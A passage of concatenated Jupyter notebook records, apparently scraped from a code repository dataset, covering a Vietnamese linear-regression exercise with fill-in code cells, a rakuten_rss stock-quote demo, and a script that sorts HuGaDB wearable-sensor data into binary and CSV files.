"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
e7078927712c388eacc8e9da22af0d24232c0e28 | 30,089 | ipynb | Jupyter Notebook | Week 2/Assignment/Assignment-Linear-Regression-with-One-Variable.ipynb | thanhhff/AIVN-Course-AI-For-Everyone | e8e582dea304341f0c03cedb920bcd1d450e5a9c | [
"MIT"
] | 25 | 2019-11-24T03:15:22.000Z | 2021-12-29T07:23:19.000Z | Week 2/Assignment/Assignment-Linear-Regression-with-One-Variable.ipynb | hyperstar1/AIVN-Machine-Learning | e8e582dea304341f0c03cedb920bcd1d450e5a9c | [
"MIT"
] | 1 | 2019-12-03T10:44:48.000Z | 2019-12-03T10:44:48.000Z | Week 2/Assignment/Assignment-Linear-Regression-with-One-Variable.ipynb | hyperstar1/AIVN-Machine-Learning | e8e582dea304341f0c03cedb920bcd1d450e5a9c | [
"MIT"
] | 13 | 2019-11-24T04:33:42.000Z | 2022-03-02T10:58:14.000Z | 49.245499 | 13,804 | 0.713583 | [
[
[
"## Programming Assignment: Linear Regression with One Variable \n\nChào mừng các bạn đến với bài tập lập trình Linear Regression with One Variable (Hồi quy tuyến tính đơn biến). Trước khi thực hiện bài tập này, các bạn nên học kỹ các kiến thức lý thuyết. Nếu có bất kỳ câu hỏi hay vấn đề nào xảy ra, các bạn hãy để lại comment trực tiếp bên dưới bài đăng hoặc liên hệ qua Fanpage AIVIETNAM.\n\nTrong bài tập này, các bạn sẽ thực hiện dự đoán lợi nhuận từ việc bán hàng từ dân số trong thành phố. \n\n### Hướng dẫn làm bài \n- Trong bài tập này bạn sẽ sử dụng Python 3.\n- Cố gắng không sử dụng các vòng lặp (for, while). \n- Hãy sử dụng các hàm của thư viện numpy.\n- Sau khi bạn viết Code của mình xong, hãy chạy dòng Code đó để xem kết quả bên dưới. \n\nCác bạn sẽ bắt đầu Code trong phần `### START CODE HERE ###` và `### END CODE HERE ###`. Các bạn nhớ đừng sửa bất kỳ dòng Code nào bên ngoài những câu lệnh này. \n\nSau khi viết xong Code của bạn, bạn hãy ấn \"SHIFT\"+\"ENTER\" để thực hiện chạy lệnh của Cell đó. \n\nTrong phần Code: các bạn hãy cố gắng thực hiện ít dòng Code nhất theo chỉ định \"(≈ X lines of code)\". Mặc dù đây không phải là hạn chế về số dòng Code của bạn, nhưng hãy tối ưu sao cho ít nhất có thể.",
"_____no_output_____"
]
],
[
[
"# Import thư viện \n%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn; seaborn.set_style(\"whitegrid\")",
"_____no_output_____"
]
],
[
[
"### 1. Plotting the Data (Hiển thị dữ liệu)\n\nTrước khi thực hiện bất cứ nhiệm vụ nào, việc hiển thi dữ liệu và trực quan hoá sẽ giúp bạn phần nào hình dung được sự phân bố của dữ liệu.",
"_____no_output_____"
]
],
[
[
"# Import dữ liệu từ file .txt\ndata = 'data/ex2data.txt'\n\n# Đọc file bằng hàm numpy.loadtxt\nx, y = np.loadtxt(data, delimiter=',', usecols=(0, 1), unpack=True)\n\n# Xem 5 giá trị đầu tiên \nx[:5], y[:5]",
"_____no_output_____"
]
],
[
[
"Biểu đồ phân tán dữ liệu",
"_____no_output_____"
]
],
[
[
"plt.scatter(x, y, marker='x', c='r', s=20)\nplt.xlabel(\"Population of City in 10,000s\")\nplt.ylabel(\"Profit in $10,000s\");",
"_____no_output_____"
]
],
[
[
"Những dòng lệnh sau sử dụng thư viện **scikit-learn** để tìm ra kết quả bài toán. Các bạn không cần quá bận tâm về điều này, nó chỉ là một phép thử để xem kết quả chúng ta thực hiện đúng hay sai.",
"_____no_output_____"
]
],
[
[
"from sklearn.linear_model import LinearRegression\nmodel = LinearRegression(fit_intercept=True)\n\nX = np.ones((len(x), 2))\nX[:,1] = x\n\nmodel.fit(X[:,1][:, np.newaxis], y)\n\nxfit = np.linspace(5, 23, 1000)\nyfit = model.predict(xfit[:, np.newaxis])\n\nplt.scatter(X[:,1], y, marker='x', c='r', s=20, label='data')\nplt.plot(xfit, yfit, label='h(x) = %0.2f + %0.2fx'%(model.intercept_, model.coef_[0]))\nplt.xlabel(\"Population of City in 10,000s\")\nplt.ylabel(\"Profit in $10,000s\")\npst = plt.legend(loc='lower right', frameon=True)\npst.get_frame().set_edgecolor('k');\nprint(\"Model intercept: \", model.intercept_)\nprint(\"Model slope: \", model.coef_[0])",
"_____no_output_____"
]
],
[
[
"### 2. Gradient Descent\n#### 2.1 Khởi tạo giá trị theta",
"_____no_output_____"
]
],
[
[
"iters = 3000\nlearning_rate = 0.01\n\n# Khởi tạo theta0, theta1 ban đầu ngẫu nhiên \n# Hàm numpy.random.seed sẽ giúp kết quả random không thay đổi khi chạy lại \nnp.random.seed(2020)\n\n# Sử dụng hàm numpy.random.randn()\n### START CODE HERE ### (≈ 2 line of code)\ntheta0 = None\ntheta1 = None\n### END CODE HERE ###",
"_____no_output_____"
],
[
"print('Theta 0: ', theta0)\nprint('Theta 1: ', theta1)",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> Theta 0: </td> \n <td> -1.7688457055759508</td>\n </tr>\n <tr> \n <td> Theta 1: </td> \n <td> 0.07555227120810952</td> \n </tr>\n</table> ",
"_____no_output_____"
]
],
[
[
"# Đếm giá trị số lượng dữ liệu \n\n### START CODE HERE ### (≈ 1 line of code)\nm = None\n### END CODE HERE ###\n\nprint('Số lượng: ', m)",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> Số lượng: </td> \n <td> 97 </td>\n </tr>\n</table> ",
"_____no_output_____"
],
[
"#### 2.2 Tính Cost Function J(θ)\n\n<center>$J(\\theta_0, \\theta_1) = \\dfrac{1}{2m} \\sum_{i=1}^m {(h_{\\theta}(x_i) - y)^2} = \\dfrac{1}{2m} \\sum_{i=1}^m {((\\theta_0 + \\theta_1{x}) - y)^2}$</center>\n\nGợi ý: sử dụng hàm `numpy.sum` để tính tổng ",
"_____no_output_____"
]
],
[
[
"def cost_function(x, y, theta0, theta1):\n \n ### START CODE HERE ### (≈ 1 line of code)\n total_error = None\n ### END CODE HERE ###\n\n return total_error",
"_____no_output_____"
],
[
"# Với 2 giá trị theta0, theta1 random theo như ở trên \ncost_function(x, y, theta0, theta1)",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td>total_error: 38.171782006110064 </td> \n </tr>\n</table> ",
"_____no_output_____"
],
[
"#### 2.3 Gradient Descent\n\nCập nhật tham số (weight)\n\n> $\\theta_0 := \\theta_0 - \\alpha \\dfrac{1}{m} \\sum_{i=1}^m {(h_{\\theta}(x_i) - y)} $\n>\n> $\\theta_1 := \\theta_1 - \\alpha \\dfrac{1}{m} \\sum_{i=1}^m {((h_{\\theta}(x_i) - y)*x_i)} $\n",
"_____no_output_____"
]
],
[
[
"def update_weights(x, y, theta0, theta1, learning_rate):\n\n theta0_deriv = 0\n theta1_deriv = 0\n \n # Thực hiện tính đạo hàm và Sum trước\n for i in range(m):\n ### START CODE HERE ### (≈ 2 line of code) \n theta0_deriv += None\n theta1_deriv += None\n ### END CODE HERE ###\n \n # Thực hiện di chuyển ngược dấu đạo hàm \n \n ### START CODE HERE ### (≈ 2 line of code) \n theta0 -= None\n theta1 -= None\n ### END CODE HERE ###\n\n return theta0, theta1",
"_____no_output_____"
],
[
"update_weights(x, y, theta0, theta1, learning_rate)",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> theta0: -1.6989308122307667 </td> \n </tr>\n <tr> \n <td> theta1: 0.8116725128922441 </td> \n </tr> \n</table> ",
"_____no_output_____"
],
[
"### 3 Thực hiện train",
"_____no_output_____"
]
],
[
[
"def train(x, y, theta0, theta1, learning_rate, iters):\n cost_history = []\n\n for i in range(iters):\n \n ### START CODE HERE ### (≈ 1 line of code) \n theta0, theta1 = None\n ### END CODE HERE ###\n \n # Tính hàm cost\n \n ### START CODE HERE ### (≈ 1 line of code)\n cost = None\n ### END CODE HERE ###\n \n # Lưu giá trị cost\n cost_history.append(cost)\n\n return theta0, theta1, cost_history",
"_____no_output_____"
]
],
[
[
"Train: ",
"_____no_output_____"
]
],
[
[
"### START CODE HERE ### (≈ 1 line of code)\ntheta0, theta1, cost_history = None\n### END CODE HERE ###\n\n# Hiển thị giá trị theta0, theta1 học được sau quá trình train\nprint('h(x) = %0.2f + %0.2fx'%(theta0, theta1))",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> h(x) = -3.89 + 1.19x </td> \n </tr>\n</table> ",
"_____no_output_____"
]
],
[
[
"# Vẽ hàm lỗi \nplt.plot(cost_history)",
"_____no_output_____"
],
[
"# Đường thẳng linear regression tìm được sau khi huấn luyện\nplt.scatter(x, y, marker='x', c='r', s=20, label='data')\nplt.plot(xfit, yfit, label='h(x) = %0.2f + %0.2fx'%(theta0, theta1))\nplt.xlabel(\"Population of City in 10,000s\")\nplt.ylabel(\"Profit in $10,000s\")\npst = plt.legend(loc='lower right', frameon=True)\npst.get_frame().set_edgecolor('k');",
"_____no_output_____"
]
],
[
[
"### 4. Thực hiện dự đoán \n\nHàm dự đoán: \n<center>$\\hat{y} = h_{\\theta}(x) = \\theta_0 + \\theta_1{x}$ </center>",
"_____no_output_____"
]
],
[
[
"def predict(x, theta0, theta1):\n \n ### START CODE HERE ### (≈ 1 line of code)\n y_hat = None\n ### END CODE HERE ###\n \n return y_hat",
"_____no_output_____"
]
],
[
[
"Thực hiện dự đoán doanh thu ở thành phố có 35000 và 70000 dân !",
"_____no_output_____"
]
],
[
[
"print(\"Profit for pop. 35000: %0.2f\"%(predict(3.5, theta0, theta1)*10000))\nprint(\"Profit for pop. 70000: %0.2f\"%(predict(7, theta0, theta1)*10000))",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> Profit for pop. 35000: 2862.47 </td> \n </tr>\n <tr> \n <td> Profit for pop. 70000: 44583.89 </td> \n </tr> \n</table> ",
"_____no_output_____"
],
[
"### 5. Visualizing J(θ)\n\nTrực quan hoá Cost Function",
"_____no_output_____"
]
],
[
[
"# Tạo Grid để tính giá trị Cost \ntheta0_vals = np.linspace(-10, 10, 80)\ntheta1_vals = np.linspace(-1, 4, 80)\n\n# Khởi tạo J_vals thành matrix 0\nJ_vals = np.zeros((len(theta0_vals), len(theta1_vals)))\n\n# Điền giá trị vào J_vals\nfor i in np.arange(theta0_vals.size):\n for j in np.arange(theta1_vals.size):\n J_vals[i, j] = cost_function(x, y, theta0_vals[i], theta1_vals[j])",
"_____no_output_____"
],
[
"from mpl_toolkits.mplot3d import Axes3D\n\nfig = plt.figure(figsize=(14, 5))\nfig.subplots_adjust(wspace=0.3)\nax1 = fig.add_subplot(121, projection='3d')\nax2 = fig.add_subplot(122)\n\ntheta_0, theta_1 = np.meshgrid(theta0_vals, theta1_vals)\n\n# Surface plot:\nax1.set_title('Surface plot')\nax1.plot_surface(theta_1, theta_0, J_vals.T, cmap='jet', rstride=3, cstride=3, antialiased=True)\nax1.view_init(elev=20, azim=318)\nax1.set_xlabel(r'$\\theta_1$', labelpad=8)\nax1.set_xlim(4,-1)\nax1.set_ylabel(r'$\\theta_0$', labelpad=8)\nax1.set_yticks(np.linspace(-10, 10, 5))\nax1.set_zlabel(r'$J(\\theta)$', labelpad=8);\n\n# Contour plot:\nax2.set_title('Contour plot, showing minimum')\nax2.contour(theta_0, theta_1, J_vals.T, np.logspace(-2, 3, 20), cmap='jet')\nax2.scatter(theta0, theta1, marker='x', color='r', s=40)\nax2.set_xlabel(r'$\\theta_0$')\nax2.set_ylabel(r'$\\theta_1$')\nax2.set_yticks(np.arange(-1,4.5,0.5));",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng:**\n\n<img src=\"data/vi-J.png\" style=\"width:60%;height:60%;\">\n",
"_____no_output_____"
],
[
"### Tổng kết\n\nThông qua bài tập này, các bạn đã nắm vững các kiến thức về:\n\n- Linear Regression with One Variable (Hồi quy tuyến tính đơn biến)\n- Gradient Descent cho hàm đơn biến\n- Tính Cost Function J(θ)\n\n\nCác bạn hãy cố gắng sử dụng hàm của thư viện numpy để việc tính toán dễ dàng hơn.\n\nVới hàm đơn biến, việc tính toán còn đơn giản. Trong bài tiếp theo, chúng ta sẽ thực hiện trên hàm đa biến và thực hiện vecto hoá dữ liệu. ",
"_____no_output_____"
],
[
"### Tài liệu tham khảo \n\n[1] [Machine Learning – Programming: Linear Regression](http://codewithmax.com/2017/09/21/machine-learning-programming-exercise-1-linear-regression/)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e707909c2309f198e05a0fbc3fccc6fe05684abc | 1,970 | ipynb | Jupyter Notebook | docs/test_rakten_rss.ipynb | zaq9/rakuten_rss | bee8fb47d42ea0071025c7abe9d71a59b3da13b5 | [
"MIT"
] | 5 | 2019-02-17T04:12:49.000Z | 2021-06-20T03:34:14.000Z | docs/test_rakten_rss.ipynb | hermitcrab56/rakuten_rss | bee8fb47d42ea0071025c7abe9d71a59b3da13b5 | [
"MIT"
] | null | null | null | docs/test_rakten_rss.ipynb | hermitcrab56/rakuten_rss | bee8fb47d42ea0071025c7abe9d71a59b3da13b5 | [
"MIT"
] | 4 | 2019-02-17T05:34:49.000Z | 2022-03-06T15:59:54.000Z | 16.554622 | 60 | 0.453807 | [
[
[
"from rakuten_rss import rss,rss_dict,fetch_open",
"_____no_output_____"
],
[
"rss('9502.T', '始値')\n",
"_____no_output_____"
],
[
"rss('9501.T', '始値')\n\n\n",
"_____no_output_____"
],
[
"fetch_open(9983)",
"_____no_output_____"
],
[
"rss_dict('9502.T', '始値','銘柄名称','現在値')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code"
]
] |
e70791826b0729846c33dbf40f0286d85f516cc0 | 36,727 | ipynb | Jupyter Notebook | organize_test_data.ipynb | dchiasson/kinetic_codec | ac9ee223980937af4bdd35b044e6d620bfcb2a1e | [
"MIT"
] | 1 | 2022-03-27T02:18:27.000Z | 2022-03-27T02:18:27.000Z | organize_test_data.ipynb | dchiasson/kinetic_codec | ac9ee223980937af4bdd35b044e6d620bfcb2a1e | [
"MIT"
] | null | null | null | organize_test_data.ipynb | dchiasson/kinetic_codec | ac9ee223980937af4bdd35b044e6d620bfcb2a1e | [
"MIT"
] | null | null | null | 38.019669 | 139 | 0.636208 | [
[
[
"import sys, os\nimport pandas as pd\nimport numpy as np\nimport csv\nimport shutil",
"_____no_output_____"
],
[
"def append_to_binary(file_name, data):\n #print(file_name)\n with open(file_name, 'ab') as bin_file:\n bin_file.write(data)\n\ndef append_line_to_csv(file_name, line):\n with open(file_name, 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(line)\n\ndef append_batch_to_csv(file_name, data):\n #print(file_name)\n with open(file_name, 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerows(data)\n",
"_____no_output_____"
],
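[
"# A minimal sanity check of the helpers above (hypothetical file names;\n# appends a few int16 samples and CSV rows so the on-disk formats can be inspected):\nappend_to_binary('demo.bin', np.int16([1, 2, 3]).tobytes())\nappend_line_to_csv('demo.csv', [1, 2, 3])\nappend_batch_to_csv('demo.csv', [[4, 5, 6], [7, 8, 9]])",
"_____no_output_____"
],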
[
"trainers = [5,12,9]\ntesters = list(range(1, 18+1))\n[testers.remove(a) for a in trainers]\n\n#file_list = ['HuGaDB_v1_walking_04_05.txt']\nfile_list = os.listdir()\nfile_list = list(filter(lambda x: x.split('.')[-1] == 'txt', file_list))\nfile_list = sorted(file_list)\nACCEL_FIX = 9.80665*2.0/32768 # m/s^2\nGYRO_FIX = 2000/32768 # deg/sec\n\nSENS = ['acc', 'gyro']\nLOCS = ['rf','rs','rt','lf','ls','lt']\nACTS = ['bicycling','running','sitting','standing','walking']\nDIMS = ['x','y','z']\n\nprocessed_dir = 'processed'\nactivity_dir = os.path.join(processed_dir, 'activity')\nsegment_dir = os.path.join(processed_dir, 'segment')\nsubject_dir = os.path.join(processed_dir, 'subject')\ntraining_dir = os.path.join(processed_dir, 'training')\nfile_dir = os.path.join(processed_dir, 'files')\n\ntry:\n shutil.rmtree(processed_dir)\nexcept FileNotFoundError:\n pass\nos.mkdir(processed_dir)\nos.mkdir(activity_dir)\n[os.mkdir(os.path.join(activity_dir, a)) for a in ACTS]\nos.mkdir(segment_dir)\n[os.mkdir(os.path.join(segment_dir, a)) for a in LOCS]\nos.mkdir(subject_dir)\n[os.mkdir(os.path.join(subject_dir, str(a))) for a in testers]\nos.mkdir(training_dir)\nos.mkdir(file_dir)\n[os.mkdir(os.path.join(file_dir, file_name)) for file_name in file_list]\n\nfor data_file in file_list:\n print(data_file)\n data = pd.read_csv(data_file, sep='\\t')\n subject = int(data_file.split('_')[-2])\n activity = data_file.split('_')[2]\n for loc in LOCS:\n sensor_data = []\n human_readable_data = []\n for sen in SENS:\n for dim in DIMS:\n one_d = data['{}_{}_{}'.format(sen, loc, dim)].values\n if sen=='acc':\n human_readable_data.append(one_d*ACCEL_FIX)\n sensor_data.append(one_d/4)\n one_d = one_d / 4 # The acceleraton sensor doesn't use the two LS bits\n if sen=='gyro':\n sensor_data.append(one_d)\n human_readable_data.append(one_d*GYRO_FIX)\n\n data_file_dir = os.path.join(file_dir, data_file)\n append_to_binary(os.path.join(data_file_dir, \"{}_{}_{}\".format(loc, sen, dim)), one_d.astype(np.int16))\n\n if subject in trainers:\n append_to_binary(os.path.join(training_dir, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n else:\n # all test\n append_to_binary(os.path.join(processed_dir, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # activity\n if activity in ACTS:\n append_to_binary(os.path.join(activity_dir, activity, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # segment\n append_to_binary(os.path.join(segment_dir, loc, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # subject\n append_to_binary(os.path.join(subject_dir, str(subject), \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n \n if subject in trainers:\n append_batch_to_csv(os.path.join(training_dir,'all.csv'), zip(*human_readable_data))\n else:\n append_batch_to_csv(os.path.join(processed_dir, 'all.csv'), zip(*human_readable_data))\n if activity in ACTS:\n append_batch_to_csv(os.path.join(activity_dir, activity, 'all.csv'), zip(*human_readable_data))\n append_batch_to_csv(os.path.join(segment_dir, loc, 'all.csv'), zip(*human_readable_data))\n append_batch_to_csv(os.path.join(subject_dir, str(subject), 'all.csv'), zip(*human_readable_data))\n\n if subject in trainers:\n append_batch_to_csv(os.path.join(training_dir,'all2.csv'), zip(*sensor_data))\n else:\n append_batch_to_csv(os.path.join(processed_dir, 'all2.csv'), zip(*sensor_data))\n if activity in ACTS:\n append_batch_to_csv(os.path.join(activity_dir, activity, 'all2.csv'), zip(*sensor_data))\n append_batch_to_csv(os.path.join(segment_dir, loc, 'all2.csv'), 
zip(*sensor_data))\n append_batch_to_csv(os.path.join(subject_dir, str(subject), 'all2.csv'), zip(*sensor_data))\n\n \n\n\n",
"HuGaDB_v1_bicycling_01_00.txt\nHuGaDB_v1_bicycling_01_01.txt\nHuGaDB_v1_bicycling_01_02.txt\nHuGaDB_v1_bicycling_01_03.txt\nHuGaDB_v1_bicycling_01_04.txt\nHuGaDB_v1_bicycling_01_05.txt\nHuGaDB_v1_bicycling_01_06.txt\nHuGaDB_v1_bicycling_01_07.txt\nHuGaDB_v1_bicycling_01_08.txt\nHuGaDB_v1_bicycling_01_09.txt\nHuGaDB_v1_bicycling_01_10.txt\nHuGaDB_v1_bicycling_01_11.txt\nHuGaDB_v1_bicycling_01_12.txt\nHuGaDB_v1_bicycling_01_13.txt\nHuGaDB_v1_bicycling_01_14.txt\nHuGaDB_v1_bicycling_01_15.txt\nHuGaDB_v1_bicycling_01_16.txt\nHuGaDB_v1_bicycling_01_17.txt\nHuGaDB_v1_bicycling_01_18.txt\nHuGaDB_v1_down_by_elevator_12_00.txt\nHuGaDB_v1_running_03_00.txt\nHuGaDB_v1_running_03_01.txt\nHuGaDB_v1_running_07_00.txt\nHuGaDB_v1_running_07_01.txt\nHuGaDB_v1_running_07_02.txt\nHuGaDB_v1_running_08_00.txt\nHuGaDB_v1_running_08_01.txt\nHuGaDB_v1_running_08_02.txt\nHuGaDB_v1_running_08_03.txt\nHuGaDB_v1_running_09_00.txt\nHuGaDB_v1_running_09_01.txt\nHuGaDB_v1_running_09_02.txt\nHuGaDB_v1_sitting_02_00.txt\nHuGaDB_v1_sitting_02_01.txt\nHuGaDB_v1_sitting_03_00.txt\nHuGaDB_v1_sitting_03_01.txt\nHuGaDB_v1_sitting_03_02.txt\nHuGaDB_v1_sitting_03_03.txt\nHuGaDB_v1_sitting_04_00.txt\nHuGaDB_v1_sitting_04_01.txt\nHuGaDB_v1_sitting_04_02.txt\nHuGaDB_v1_sitting_04_03.txt\nHuGaDB_v1_sitting_05_00.txt\nHuGaDB_v1_sitting_05_01.txt\nHuGaDB_v1_sitting_06_00.txt\nHuGaDB_v1_sitting_06_01.txt\nHuGaDB_v1_sitting_06_02.txt\nHuGaDB_v1_sitting_06_03.txt\nHuGaDB_v1_sitting_06_04.txt\nHuGaDB_v1_sitting_07_00.txt\nHuGaDB_v1_sitting_07_01.txt\nHuGaDB_v1_sitting_07_02.txt\nHuGaDB_v1_sitting_07_03.txt\nHuGaDB_v1_sitting_07_04.txt\nHuGaDB_v1_sitting_08_00.txt\nHuGaDB_v1_sitting_08_01.txt\nHuGaDB_v1_sitting_08_02.txt\nHuGaDB_v1_sitting_09_00.txt\nHuGaDB_v1_sitting_09_01.txt\nHuGaDB_v1_sitting_09_02.txt\nHuGaDB_v1_sitting_09_03.txt\nHuGaDB_v1_sitting_10_00.txt\nHuGaDB_v1_sitting_10_01.txt\nHuGaDB_v1_sitting_10_02.txt\nHuGaDB_v1_sitting_10_03.txt\nHuGaDB_v1_sitting_10_04.txt\nHuGaDB_v1_sitting_11_00.txt\nHuGaDB_v1_sitting_11_01.txt\nHuGaDB_v1_sitting_11_02.txt\nHuGaDB_v1_sitting_11_03.txt\nHuGaDB_v1_sitting_12_00.txt\nHuGaDB_v1_sitting_12_01.txt\nHuGaDB_v1_sitting_12_02.txt\nHuGaDB_v1_sitting_12_03.txt\nHuGaDB_v1_sitting_13_00.txt\nHuGaDB_v1_sitting_13_01.txt\nHuGaDB_v1_sitting_13_02.txt\nHuGaDB_v1_sitting_13_03.txt\nHuGaDB_v1_sitting_13_04.txt\nHuGaDB_v1_sitting_13_05.txt\nHuGaDB_v1_sitting_13_06.txt\nHuGaDB_v1_sitting_14_00.txt\nHuGaDB_v1_sitting_14_01.txt\nHuGaDB_v1_sitting_14_02.txt\nHuGaDB_v1_sitting_14_03.txt\nHuGaDB_v1_sitting_15_00.txt\nHuGaDB_v1_sitting_15_01.txt\nHuGaDB_v1_sitting_15_02.txt\nHuGaDB_v1_sitting_15_03.txt\nHuGaDB_v1_sitting_16_00.txt\nHuGaDB_v1_sitting_16_01.txt\nHuGaDB_v1_sitting_16_02.txt\nHuGaDB_v1_sitting_16_03.txt\nHuGaDB_v1_sitting_16_04.txt\nHuGaDB_v1_sitting_16_05.txt\nHuGaDB_v1_sitting_17_00.txt\nHuGaDB_v1_sitting_17_01.txt\nHuGaDB_v1_sitting_17_02.txt\nHuGaDB_v1_sitting_17_03.txt\nHuGaDB_v1_sitting_17_04.txt\nHuGaDB_v1_sitting_17_05.txt\nHuGaDB_v1_sitting_17_06.txt\nHuGaDB_v1_sitting_18_00.txt\nHuGaDB_v1_sitting_18_01.txt\nHuGaDB_v1_sitting_18_02.txt\nHuGaDB_v1_sitting_18_03.txt\nHuGaDB_v1_sitting_18_04.txt\nHuGaDB_v1_sitting_in_car_01_00.txt\nHuGaDB_v1_sitting_in_car_01_01.txt\nHuGaDB_v1_sitting_in_car_01_02.txt\nHuGaDB_v1_sitting_in_car_01_03.txt\nHuGaDB_v1_sitting_in_car_01_04.txt\nHuGaDB_v1_sitting_in_car_01_05.txt\nHuGaDB_v1_sitting_in_car_01_06.txt\nHuGaDB_v1_sitting_in_car_01_07.txt\nHuGaDB_v1_sitting_in_car_01_08.txt\nHuGaDB_v1_sitting_in_car_01_09.txt\nHuGaDB_v1_sitting_in_car_01_10.txt\nHuGaDB_v
1_sitting_in_car_01_11.txt\nHuGaDB_v1_sitting_in_car_01_12.txt\nHuGaDB_v1_sitting_in_car_01_13.txt\nHuGaDB_v1_sitting_in_car_01_14.txt\nHuGaDB_v1_standing_01_00.txt\nHuGaDB_v1_standing_01_01.txt\nHuGaDB_v1_standing_01_02.txt\nHuGaDB_v1_standing_01_03.txt\nHuGaDB_v1_standing_03_00.txt\nHuGaDB_v1_standing_04_00.txt\nHuGaDB_v1_standing_04_01.txt\nHuGaDB_v1_standing_04_02.txt\nHuGaDB_v1_standing_04_03.txt\nHuGaDB_v1_standing_05_00.txt\nHuGaDB_v1_standing_05_01.txt\nHuGaDB_v1_standing_06_00.txt\nHuGaDB_v1_standing_07_00.txt\nHuGaDB_v1_standing_07_01.txt\nHuGaDB_v1_standing_07_02.txt\nHuGaDB_v1_standing_07_03.txt\nHuGaDB_v1_standing_08_00.txt\nHuGaDB_v1_standing_08_01.txt\nHuGaDB_v1_standing_08_02.txt\nHuGaDB_v1_standing_08_03.txt\nHuGaDB_v1_standing_09_00.txt\nHuGaDB_v1_standing_09_01.txt\nHuGaDB_v1_standing_09_02.txt\nHuGaDB_v1_standing_09_03.txt\nHuGaDB_v1_standing_09_04.txt\nHuGaDB_v1_sta